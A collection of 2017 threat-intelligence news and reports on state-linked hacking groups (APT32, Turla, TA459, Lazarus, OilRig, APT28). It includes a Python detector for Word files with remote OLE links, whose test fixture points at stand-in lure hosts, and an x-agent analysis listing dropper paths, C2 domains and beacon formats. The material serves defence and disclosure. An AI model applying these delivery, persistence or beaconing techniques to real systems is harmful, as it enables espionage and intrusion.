- APT -

Last update 09.10.2017 12:41:24




APT32: Vietnamese Hackers Target Foreign Corporations

15.5.2017 securityweek APT
APT32 is the "newest named advanced persistent threat group," according to a new report from FireEye. Published yesterday, the report shows it to be a sophisticated and well-resourced cyber espionage actor targeting Vietnamese interests around the globe -- and although not previously classified in the APTn scheme, it has been operating since at least 2013. The APTn designation itself also dates back to 2013, when Mandiant used it to describe the first hacking group, APT1, that it was willing to call 'state-sponsored'.

FireEye's analysis stops short of defining APT32 as another state-sponsored hacking group; but that is the clear suspicion. "APT32," writes Nick Carr, senior manager of FireEye's Mandiant Incident Response team, "leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests."

He subsequently told Reuters that it was impossible to identify or locate the hackers precisely, or to confirm they were working for the Vietnamese government, but that the information they sought would be of very little use to any other party. He also said that in some cases the intrusions seemed to be assessing the victims' adherence to national regulations.

The Vietnamese government denies this. "The government of Vietnam does not allow any form of cyber-attacks against organizations or individuals," said foreign ministry spokeswoman Le Thi Thu Hang. "All cyber-attacks or threats to cybersecurity, must be condemned and severely punished in accordance with regulations and laws."

The APT32 targets include a European corporation that was about to construct a manufacturing facility in Vietnam in 2014; numerous Vietnamese and foreign corporations in 2016; a hospitality developer planning to expand operations in Vietnam in 2016; and the Vietnamese offices of a global consulting firm in 2017. In all cases, espionage would give the Vietnam government either a commercial advantage in discussions, or greater understanding of foreign companies within the country.

Other attacks, however, have been targeted at individuals outside of Vietnam -- more specifically governments, journalists, and members of the Vietnam diaspora who, warns Carr, "may continue to be targeted."

FireEye's isolation of APT32 followed its investigations into intrusions at several corporations with business interests in Vietnam. These investigations provided "sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye's newest named advanced persistent threat group: APT32."

FireEye's analysis of APT32's current campaign depicts a well-resourced and innovative attacker. It uses phishing emails containing a weaponized attachment. Unusually, the attachment is not a Word document but an ActiveMime (an undocumented Microsoft format) file. This file contains an OLE file containing malicious macros.

The attacker also used a novel approach to track the success of its phishing emails, using legitimate cloud-based email analytics. The phishing attachment can contain HTML image tags. "When a document with this feature is opened," writes Carr, "Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms."

If the macros are successfully loaded, they create two scheduled tasks to act as persistence mechanisms for two backdoors. The first launches Squiblydoo, an application whitelisting bypass for scripts, to enable the download of a backdoor from APT32's infrastructure. The second leads to a secondary backdoor delivered as a multi-stage PowerShell script configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.

APT32's persistence and obfuscation goes further. "Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon's Invoke-Obfuscation framework," notes the analysis.

It is APT32's use of a custom suite of backdoors that has helped FireEye tie different campaigns to this one particular group. That suite includes Windshield, Komprogo, Soundbite, Phoreal, and Beacon. "FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests," writes Carr. He warns that APT32 demonstrates that state-sponsored cyber espionage is no longer necessarily limited to the few known actors: China, Iran, Russia, and North Korea.

"As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets."


The Snake APT Group is preparing its offensive against high-profile Mac users
5.5.2017 securityweek
APT

According to experts from the Fox-IT firm, the notorious Russian Snake APT group is ready to target Mac users as well, with a new variant of its malicious code.
The sophisticated Russian Snake APT group is back and is leveraging new malware to target Mac users. The Snake APT group, also known as Turla or Uroburos, has ported its Windows backdoor to macOS.
The cyber espionage crew has been active since at least 2007; the hackers have launched several high-profile attacks against targets worldwide, including those aimed at the Swiss defense firm RUAG and the U.S. Central Command.

The Snake APT group

The hackers targeted government entities, embassies, military organizations, research and academic institutions, large corporations and also intelligence agencies.

“Researchers who have previously analyzed compromises where Snake was used have attributed the attacks to Russia. Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, its infrastructure more complex and targets more carefully selected,” reads the analysis published by the security firm Fox-IT.

“The framework has traditionally focused on the Windows operating system, but in 2014 the first Linux variant was observed. Now, Fox-IT has identified a version of Snake targeting Mac OS X.”

According to the experts, the malicious code used by the Snake APT group is more sophisticated than the ones used by other Russian threat actors, including the notorious APT 28 and APT29.

“Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29 (Cozy Bear), Snake’s code is significantly more sophisticated, its infrastructure more complex and targets more carefully selected,” said the researchers.

The Snake malware was originally developed to target Windows systems, later in 2014, malware experts from Kaspersky Lab spotted a Linux variant of the malicious code.

The Fox-IT researchers recently spotted a macOS version of the Snake malware that still included artefacts referencing Microsoft’s Internet Explorer in the code, a circumstance that confirms it is a port of the Windows version. The Russian hackers are improving their arsenal to target Apple users.

The researchers believe the malware is in a testing phase because they haven’t seen the macOS sample being distributed in the wild.

“Several strings found throughout the binary indicate that this version is in fact a debug build.”

The Snake macOS sample discovered by the malware researchers at Fox-IT masquerades as a Flash Player installer and is signed with a legitimate Apple code signing certificate, likely stolen by the APT. It obtains persistence via Apple’s LaunchDaemon service.

“The Snake binary comes inside of a ZIP archive named Adobe Flash Player.app.zip which is a backdoored version of Adobe’s Flash Player installer,” continues the analysis.

Fox-IT reported its discovery to the Apple security team.


Chinese TA459 APT exploits CVE-2017-0199 flaw to target financial firms
3.5.2017 securityaffairs
APT

Malware researchers at the security firm Proofpoint reported that the Chinese TA459 APT has exploited the CVE-2017-0199 vulnerability to target financial firms.
The notorious cyber espionage group tracked as TA459 has targeted analysts working at major financial firms using the recently patched CVE-2017-0199 Microsoft Office vulnerability.

Experts at Proofpoint published a detailed analysis of the espionage campaign conducted by the TA459 APT group against military and aerospace organizations in Russia and Belarus.

“Proofpoint is tracking this attacker, believed to operate out of China, as TA459. The actor typically targets Central Asian countries, Russia, Belarus, Mongolia, and others,” reads the analysis published by Proofpoint. “TA459 possesses a diverse malware arsenal including PlugX, NetTraveler, and ZeroT.”

The TA459 APT group has been active since at least 2013; the hackers have leveraged several malware families in their campaigns, including NetTraveler, PlugX, Saker, Netbot, DarkStRat, and ZeroT. The hackers have mostly focused their efforts on spying on organizations in Russia and neighboring countries.

The attacks conducted by the TA459 APT group were apparently aimed at analysts covering the telecommunications industry. Proofpoint researchers speculate that this latest campaign is likely a continuation of the campaign they uncovered in the summer of 2015.

“Proofpoint researchers recently observed a campaign targeting telecom and military in Russia. Beginning in July 2015 (and possibly earlier), the attack continued into August” wrote Proofpoint.

The TA459 APT leveraged spear-phishing emails carrying weaponized Word documents that trigger the CVE-2017-0199 flaw. The hackers started exploiting the Office flaw just a few days after Microsoft released a fix.

When victims open the decoy document, an HTML application (HTA) file disguised as an RTF document is downloaded. The attack uses PowerShell to download and execute a script that fetches and runs the ZeroT downloader.

Chinese TA459 APT decoy document

Proofpoint noticed some improvements in the last ZeroT version such as the use of a legitimate McAfee utility for sideloading instead of a Norman Safeground utility.

“The attack group has made incremental changes to ZeroT since our last analysis. While they still use RAR SFX format for the initial payloads, ZeroT now uses the legitimate McAfee utility named mcut.exe instead of the Norman Safeground AS for sideloading as they have in the past. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously,” continues the analysis.

Proofpoint reported that the TA459 APT group used both PlugX and a Trojan tracked as PCrat/Gh0st in the last wave of attacks.

The experts urge multinational organizations to stay vigilant about state-sponsored actors that use sophisticated malware in their cyber espionage campaigns.

“Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicates an already difficult security situation for organizations dealing with more traditional malware threats, phishing campaigns, and socially engineered threats every day,” concluded Proofpoint.



Kaspersky Lab APT Trends report, Q1 2017 – From Lazarus APT to StoneDrill
2.5.2017 securityaffairs
APT

Kaspersky is currently monitoring the activities of more than 100 threat actors, from the Lazarus APT to StoneDrill.
According to the experts from Kaspersky Lab, the infamous Lazarus APT group, aka BlueNoroff, is the most dangerous threat against financial institutions worldwide.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

Experts at Symantec collected evidence demonstrating that the Lazarus APT group was behind the campaign that leveraged “loader” software used to stage attacks by installing other malicious programs.

Both US and South Korea governments are blaming Pyongyang for the attacks, but the North Korean government has denied allegations it was behind the hacks.

The Lazarus APT has been associated with numerous cyber attacks against high-profile targets, including the 2014 Sony Pictures hack, the Bangladesh cyberheist at the New York Federal Reserve Bank and the recent attack against banks in Poland.

According to Kaspersky Lab, the hacking campaign against banks worldwide is still ongoing, recently the experts detected new malware samples linked to the group’s activity.

Below are the findings of an APT trends report recently published by Kaspersky Lab:

We believe BlueNoroff is one of the most active groups in terms of attacks against financial institutions and is trying to actively infect different victims in several regions.
We think their operations are still ongoing, and in fact, their most recent malware samples were found in March 2017.
At the moment we believe BlueNoroff is probably the most serious threat against banks.
Kaspersky is currently monitoring the activities of more than 100 threat actors, APT groups and financially motivated cybercrime gangs, that are targeting almost any industry across over 80 countries.

Other APT groups tracked by Kaspersky that were most active in the first quarter of 2017 were the Shamoon and StoneDrill actors. According to the researchers, the two are separate groups with aligned interests, and are likely working together to compromise Saudi targets with highly sophisticated wiper malware.

The experts linked the StoneDrill malware to the Shamoon 2 attacks and to the Charming Kitten campaign (aka Newscaster and NewsBeef).

The malware was used by threat actors against entities in Saudi Arabia and at least one organization in Europe.

StoneDrill Lazarus APT

The experts discovered many similarities between malware styles and malware components in Shamoon, StoneDrill, and NewsBeef.

Malware researchers highlighted that APT groups increasingly rely on generic tools in their attacks, which makes attribution of the attacks harder.

“Rather than creating and having their own tools, these use generic tools that are good enough to complete an operation, and provide an evident economic advantage, with the added value of making both analysis of the incident and attribution to a particular actor more difficult.” states the report.

“Nowadays there is a large number of different frameworks providing cyber-actors with many options, especially for lateral movement. This category includes Nishang, Empire, Powercat, Meterpreter, etc. Interestingly, most of these are based on Powershell, and allow the use of fileless backdoors.”


APT Trends report, Q1 2017
2.5.2017 Kaspersky
APT

Kaspersky Lab is currently tracking more than a hundred threat actors and sophisticated malicious operations targeting commercial and government organizations in over 80 countries. During the first quarter of 2017, there were 33 private reports released to subscribers of our Intelligence Services, with Indicators of Compromise (IOC) data and YARA rules to assist in forensics and malware-hunting.

We continue to observe a sharp rise in the sophistication of attacks with nation-state backing and a merger of tactics, techniques, and procedures (TTPs) between APT actors and financially motivated cybercriminals. We have witnessed the Middle East becoming one of the major cyber battlefields. At the same time, during Q1 2017, the discovery of a new Wiper victim in Europe raised eyebrows and suggested that these kinds of destructive attacks have now spread beyond the Middle East.

In this report, we discuss the targeted attack highlights from the first quarter of 2017, and discuss some emerging trends that demand immediate attention.

Highlights in targeted attacks

Evolution of Wipers: a new weapon for APT actors

During the last few months a new wave of wiper attacks, mainly focused against Saudi interests, raised a red flag for many companies, and for good reason. The new wave of Shamoon attacks apparently relied on stolen credentials from Active Directory for their internal distribution stage. The investigation of these attacks led us to the discovery of a new wiper we called StoneDrill.

We believe both Shamoon and StoneDrill groups are aligned in their interests, but are two separate actors, which might also indicate two different groups working together.

Our technical analysis of StoneDrill led to the discovery of old samples (2014) in our collection that share their base code with the new StoneDrill samples. Interestingly, these old samples were attributed to the NewsBeef (Charming Kitten) group. The similarities between samples include sharing the same credentials (username and password) for C2 communications, which establishes a very strong link between them.

Figure 1. Credentials used for C2 communication both in StoneDrill and NewsBeef samples

We believe that StoneDrill might be a more recent version of NewsBeef artifacts, effectively relating the known APT actor with this new wave of wiper attacks.

In addition, and related to the Shamoon attacks, we have collected different artifacts that might have been used by the actor during the first stages of attack. This first stage is critical, as credentials need to be stolen for the subsequent distribution of the malware at the victim’s premises.

Ismdoor is a backdoor found to be related to the Shamoon attacks, and might serve the attackers’ purposes well. It was found mainly in Saudi Arabia, at organizations belonging to the oil and energy industry. The analysis revealed very interesting details about additional tools used by the attackers for lateral movement, which were mainly built on PowerShell-based exploitation frameworks, following the trend of using fileless generic malware explained later in this report.

Finally, it is remarkable that we have detected the first victim of StoneDrill in Europe. The victim belongs to the energy industry, which might be an indicator that this actor is spreading out of the Middle East. After attributing this wiper to what we believe might be a government-sponsored actor, this fact is highly worrying, as it might indicate a geopolitically-motivated spread of cyber-sabotage operations. This last assumption is yet to be confirmed.

Summary:

Wipers are now extending their geography
Wipers are now a part of the arsenal of APT groups. They can be used in destructive operations, as well as for deleting traces after a cyberespionage operation.
One of the modules used in the last Shamoon wave of attacks had ransomware capabilities, which might be considered another form of not-so-obvious wiping.
The fact that these destructive operations against energy companies might be related to some government sponsored APT actors is definitely worrying, and surpasses typical espionage operations.

BlueNoroff/Lazarus: bank robbery, evolved

A massive waterhole attack targeting Polish banks was publicly disclosed on 3 February, 2017. The attack leveraged the webserver of a Polish financial sector regulatory body, the Polish Financial Supervision Authority (www.knf.gov.pl), which was hacked and used to redirect users to an exploit kit. A very similar technique was used against the Mexican financial authority at the same time, and even if no other victims of this group were made public, it is very likely that more banks were also similarly affected.

Our analysis linked the attack with the BlueNoroff/Lazarus group, which has been responsible for multiple other bank attacks, including the famous Bangladesh bank heist. This waterhole attack revealed, for the first time, one of the strategies used by BlueNoroff for gaining a foothold in its target organizations. Although the attack didn’t use any zero days, the Flash Player and Silverlight exploit appeared to be enough to compromise a large number of banks, which were running on outdated software.

Indeed, we started tracking the BlueNoroff actor a long time ago. We originally saw this actor trying to infect banks in the South-East Asian region. BlueNoroff has developed a characteristic set of tools for lateral movement inside targeted organizations, and in several cases attempted tampering with SWIFT software for cashing out. This technique showed its enormous potential with the Bangladesh central bank heist, where attackers attempted to steal more than 900 million USD. In the February “Polish case”, we saw the group reusing these known lateral movement tools repackaged for their new wave of victims. This provided us with a high degree of confidence in attributing the attack to this actor.

Interestingly, the BlueNoroff group planted Russian words within the code, to derail investigators and avoid attribution. The code contained grammar errors a native Russian speaker wouldn’t make, and sentences were likely translated using online tools.

Summary:

We believe BlueNoroff is one of the most active groups in terms of attacks against financial institutions and is trying to actively infect different victims in several regions.
We think their operations are still ongoing, and in fact, their most recent malware samples were found in March 2017.
At the moment we believe BlueNoroff is probably the most serious threat against banks.
Fileless malware: enough for the job with no attribution

Avoiding attribution is one of the key goals for many APT actors, especially since a large number of operations have been exposed in recent years. For the most sophisticated groups, the problem is that they already have well-established procedures, specially crafted tools and training, which do not always allow them to stay unnoticed.

But that is not the case for the not-so-big actors or cybercriminals. Rather than creating and having their own tools, these use generic tools that are good enough to complete an operation, and provide an evident economic advantage, with the added value of making both analysis of the incident and attribution to a particular actor more difficult.

Nowadays there is a large number of different frameworks providing cyber-actors with many options, especially for lateral movement. This category includes Nishang, Empire, Powercat, Meterpreter, etc. Interestingly, most of these are based on Powershell, and allow the use of fileless backdoors.

We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions.

This trend makes traditional forensic analysis harder, traditional IOCs such as file hashes obsolete, application whitelisting more difficult, and antivirus evasion easier. It also helps to evade most of the log activity.

On the other hand, attackers usually need to escalate privileges or steal administrator credentials; they don’t usually have a reboot survival mechanism on the machines they want to infect, and they rely on accessing them again once they are reconnected to the infected network. The use of standard tools in the victim environment might also limit their options. This new paradigm is still unfolding and the best practices from a defense perspective are currently not totally clear. However, we offer our recommendations in the final section of this document.

Summary:

No malware samples are needed for the successful exfiltration of data from a network.
The use of standard and open source utilities, combined with different tricks, makes detection and attribution almost impossible.
The determination of attackers to hide their activity and make detection and incident response increasingly difficult explains the latest trend of anti-forensic techniques and memory-based malware. That is why memory forensics is becoming critical to the analysis of malware and its functions.
Incident response in cases like this is key.
How to keep yourself protected

Exploiting vulnerabilities remains a key approach to infecting systems, therefore timely patching is of utmost importance – which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.

Given the trend of using PowerShell-based techniques, including bodiless malware scenarios, you need to make sure that your security solution is aware of such specifics. All tiers of Kaspersky Endpoint Security for Business as well as Kaspersky Security for Virtualization possess the broadest range of machine learning-powered detection techniques, including those specifically taking care of malware using PowerShell. Our behavioral System Watcher technology is also aware of specific Wiper activities like mass file deletion; after blocking the malware, its Rollback feature brings important user files back from their deleted state.

Still, it is necessary to understand that targeted attacks are dangerous not only because of their sophistication (which sometimes is not the case), but because they are usually well-prepared, and try to leverage security gaps unobvious to their targets.

Therefore, it is highly recommended that you arm yourself not only with prevention (such as endpoint protection) but also with detection capabilities, specifically with a solution that can detect anomalies in the whole network’s ongoing activities, and scrutinize suspicious files at a much deeper level than it is possible on users’ endpoints. Kaspersky Anti Targeted Attack is an intellectual detection platform that matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, Kaspersky Anti Targeted Attack is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.

And the best way to prevent the attackers from finding and leveraging security holes is getting rid of them all, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advice on how to fix them, further strengthening corporate security.


The massive attack against Israel was allegedly launched by the Iranian OilRig APT group
28.4.2017 securityaffairs
APT

According to the experts at the security firm Morphisec, the massive attack against Israeli targets was powered by the OilRig APT group.
Yesterday the Israeli Cyber Defense Authority announced it had thwarted a major cyberattack against 120 targets, just days after harsh criticism of a new cyber defense bill.
At first, the authorities blamed a foreign state for the massive cyber espionage campaign against major Israeli institutions and government officials; now the Authority blames Iranian state-sponsored hackers for the cyber attack.

The Israeli experts believe the attack was launched by the OilRig APT group (aka Helix Kitten, NewsBeef), an Iran-linked APT that has been around since at least 2015.

According to the Israeli Cyber Defense Authority, hackers targeted some 250 individuals between April 19 and 24 in various sectors, including government agencies, high-tech companies, medical organizations, and educational institutions, including the renowned Ben-Gurion University.

Hackers also targeted experts at the prestigious Ben-Gurion University, where researchers conduct advanced research. The threat actors leveraged stolen email accounts from Ben-Gurion to deliver malware to victims.

“From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations. Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details. Initial reports of the attacks, published April 26 (in Hebrew) by the Israel National Cyber Event Readiness Team (CERT-IL) and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel. Ironically, Ben-Gurion University is home to Israel’s Cyber Security Research Center,” reads the analysis shared by Morphisec. “Investigators put the origin of the attack as Iranian; Morphisec’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns.”

Hackers used weaponized Word documents triggering the recently-patched Microsoft RCE vulnerability, tracked as CVE-2017-0199.

OilRig APT group Cyberattack on Israel

The exploitation of this specific flaw demonstrates the technical evolution of the OilRig APT group. Unlike macro-enabled attacks, the attack does not require user interaction: the weaponized document carries the exploit as an embedded link pointing to an HTML executable.

“The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, CVE-2017-0199, by actually reusing an existing PoC that had been published immediately after the patch release. Microsoft released the patch for the vulnerability on April 11 but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent,” continues the analysis.
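Both the CVE-2017-0199 lure described here (an embedded link to an HTML executable) and the APT32 remote-image beacon described earlier leave their trace in the same place in a Word file saved as OOXML: the package relationship parts, where an out-of-package target is marked TargetMode="External". The following Python check is an added example, not code from Morphisec, Proofpoint or FireEye; it walks every .rels part of a .docx and reports externally-targeted oleObject, image and attachedTemplate relationships while ignoring ordinary hyperlinks. The sample document and the .example hostnames are constructed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Relationship types whose target should never leave the package. An external
# oleObject is how the CVE-2017-0199 lures pulled their HTA; an external image
# is the remote-image beacon Word fetches even with macros disabled.
SUSPICIOUS_TYPES = {
    "/relationships/oleObject": "external OLE object link (CVE-2017-0199 delivery pattern)",
    "/relationships/image": "external image (remote tracking beacon)",
    "/relationships/attachedTemplate": "external attached template",
}
REMOTE_TARGET = re.compile(r"(?i)^(?:https?|file)://")


def scan_docx(data: bytes):
    """Walk every .rels part in an OOXML package and return
    (part, label, target) for each externally-targeted relationship of a
    suspicious type. Ordinary hyperlinks are external too and are ignored."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rtype, target = rel.get("Type", ""), rel.get("Target", "")
                label = next((lbl for suffix, lbl in SUSPICIOUS_TYPES.items()
                              if rtype.endswith(suffix)), None)
                if label and REMOTE_TARGET.match(target):
                    findings.append((part, label, target))
    return findings


def build_sample_docx() -> bytes:
    """Constructed minimal .docx (not a real sample): its document.xml.rels
    carries an external oleObject link, an external image, and a benign
    hyperlink. Hostnames use the reserved .example TLD."""
    rels = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://lure.example/template.rtf" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://tracker.example/pixel.png" TargetMode="External"/>
  <Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.example.com/" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("word/document.xml",
                    "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, label, target in scan_docx(build_sample_docx()):
        print(f"{part}: {label} -> {target}")
```

Running it over a mail gateway's attachment queue gives a cheap triage signal that works whether or not the patch for CVE-2017-0199 has been deployed, since it inspects the file rather than the vulnerable code path.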

Experts at Morphisec discovered that hackers used a customized version of the open-source Mimikatz tool to gain access to user credentials in the Windows Local Security Authority Subsystem Service.

“Morphisec identified a few more samples of communication with different other C&C servers (“alenupdate[.]info” and “maralen[.]tk”) in which a more advanced customized version of Mimikatz has been sent to specific users and additional agents have been installed in the “C:\Program Files (x86)\Microsoft Idle\” directory,” states Morphisec.

Earlier this year the OilRig APT was involved in a string of cyber attacks targeting several Israeli organizations, including IT vendors, the national postal service, and financial institutions.

Security experts from ClearSky discovered that the Iranian hackers set up a fake Juniper Networks VPN portal and used compromised email accounts from IT vendors to lure victims to it. According to ClearSky, OilRig APT leveraged digitally signed malware and fake University of Oxford domains in its campaign.


Cracking APT28 traffic in a few seconds
27.4.2017 securityaffairs
APT

Security experts from security firm Redsocks published an interesting report on how to crack APT28 traffic in a few seconds.
Introduction
APT28 is a hacking group involved in many recent cyber incidents. The most recent attack allegedly attributed to this group is the one against French presidential candidate Emmanuel Macron’s campaign. Incident response to these Advanced Persistent Threats (APTs) and damage limitation rely heavily on network traffic investigation.

In late 2016, Redsocks security identified one expired domain attributed to APT28. Our effort to sinkhole APT28 using this domain was impeded by the encrypted communication channel. Although many published white papers on APT28, such as ESET’s, mention the RC4 encryption algorithm, they do not go into the details of the key used or of APT28’s implementation of RC4, i.e. whether the key is static and breakable. In this report, we aim to present the results of our comprehensive dynamic analysis of the x-agent malware, carried out with the goal of decrypting its traffic. We started our investigation with one of the APT28 droppers (see Table 1).

[Table 1: dropper and payload hashes (image not reproduced in this copy)]

The focus of our investigation has been decrypting the traffic APT28 communicates. Thus, this report elaborates mostly on the encryption functionality of x-agent and reports our findings on cracking x-agent traffic. That said, our report is not limited to encryption cracking and also sheds light on the following:

Execution behavior of the dropper and x-agent
Network behavior of x-agent
Encryption of APT28 and an algorithm to crack it in few seconds
Following the encryption/decryption scheme we present, and by large-scale internet scanning for the URL pattern we introduce in this white paper, currently active APT28 servers and victims can be found. Communication with these servers for further investigation can then be established.

X-agent dropper
The dropper functions in two steps. In the first step, it only unpacks a dll into the Windows folder. The name of the file is fixed (static) and does not change across multiple executions or on different workstations. In the second step, the dropper loads the dll by calling the ShellExecuteW function of the shell32 library. This function is called with rundll32.exe as the program and "C:\Windows\83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll",init as its arguments. This means that later traces of the malware should be looked for in the rundll32 execution. The dropper also creates the “ose00000.exe” file in the Windows folder and calls it with the dll path and the dropper path as arguments. In summary, the dropper creates two files, “83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll” and “ose00000.exe”, in the Windows directory with the hidden attribute (see Table 1 for the corresponding hashes) and loads one of them with rundll32.exe. The result of the dropper execution is rundll32.exe and ose00000.exe running as two separate processes. No network activity was observed during dropper execution.

X-agent dropped rootkit
The dropper’s goal is to transfer control to 83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll (see Table 1 for the SHA256 hash), which is a rootkit with keylogging and remote code execution capabilities.

X-agent architecture

x-agent has a sophisticated architecture; it is modular in both its functionality and its communication-channel implementation. Figure 1 presents the x-agent architecture of the sample we analyzed.

[Figure 1: x-agent architecture (image not reproduced in this copy)]

X-agent execution

Execution starts from the init function of the dll loaded by rundll32. The first interesting event after control is transferred to Init is a call to KERNEL32.GetVolumeInformationW. After this call, the Init function initializes the global variables:

[Disassembly of the global-variable initialization (screenshot not reproduced in this copy)]

Next, the init function initializes the modules available for execution (see the ESET report for an explanation of the modules). Our malware sample had 3 modules:

KeyLogging modules, dubbed in code as modKey
File system module, dubbed in code as modFS
Remote Shell module, dubbed in code as modProcRet
After initializing the data structure of these modules, CHOPSTICK creates different threads for different tasks. Modules are created in a loop based on their configuration and AgentKernel is created differently:

[Disassembly of the thread-creation loop (screenshot not reproduced in this copy)]

After the threads are created, execution is transferred to the AgentKernel and module threads. The AgentKernel module initially prepares a message for the server and then waits for the server to respond with a command. The message introduces the victim to the server by an agent ID and reports the modules supported for execution. This message is written to the edg6EF885E2.tmp file in the temp folder. The sample we analyzed communicates over an HTTP channel; the implementation uses the WININET APIs.

Before sending data, the channel thread checks connectivity to the server. It first tries to resolve the “adobeincorp.com” domain name. If that fails, it tries connecting to two hardcoded IP addresses. After a successful connection to the server, it creates the URL request and the POST data from the data prepared by the other modules. X-agent first sends a GET request and then a POST request. The communication is always encrypted. We explain the nature of the communicated data and the encryption method in the next section.

In summary, these sequences of actions happen in every execution of x-agent:

Call to KERNEL32.GetVolumeInformationW
Creation of at least 5 different threads
Read and write to edg6EF885E2.tmp in the temp directory
Connectivity check by a call to socket.connect
Encryption of the URL query string and POST data
A GET request
A POST request
Supported commands and the agent number sent to the server using the WININET HTTP APIs

X-agent traffic communication

In order to explain how to decrypt APT28 traffic, we first need to understand the traffic pattern of the malware. The x-agent version 1 we analyzed communicates by sending an initial GET request followed by HTTP POST requests. The HTTP header values of the requests are hardcoded, except for one query-string parameter. The URL of an x-agent request looks like:

/webhp?rel=psy&hl=7&ai=L2Bd93t_o-jl022K1Og4Bm9mSk8QO88K_3ZQZuKcoPwur-5Q7Y=

The “/webhp?rel=psy&hl=7&ai=” part of the URL and the final “=” sign are constant across executions. As a matter of fact, “/webhp?rel=psy&hl=7&ai=” is hardcoded in the code. The following 51 bytes are not plaintext; briefly, they contain the timestamp of the request and the ID of the agent. The initial POST data of x-agent is 71 bytes and also ends with a “=”. The data is encrypted and, when decrypted, equals:

56 34 4D 47|4E 78 5A 57|6C 76 63 6D|68 6A 4F 47|39 79 5A 51|6B 30 84 F2|01 00 00 01|00 23 01 10|23 01 11 23|01 13 23

In the original figure the bytes are colour-coded: the blue part is the ID of the agent (the victim), the yellow part is the ID of the module that sent the data, and the green part is the list of modules, separated by the # character (0x23), that are installed and ready to be used by the server (the trailing 23 01 10 23 01 11 23 01 13 23 above; see Figure 4 for more explanation).

Below is x-agent’s HTTP implementation of the channel:

[Disassembly of the HTTP channel implementation (screenshot not reproduced in this copy)]

X-agent traffic encryption
Encryption module

The encryption procedure is called with two arguments, both pointers to data structures. These data structures give the encryption class access to the following two items:

The seed for encryption
The data to be encrypted
The seed is hardcoded; among other things, the init function copies it to the data segment using immediate constants:

[Disassembly of the seed being copied with immediate constants (screenshot not reproduced in this copy)]

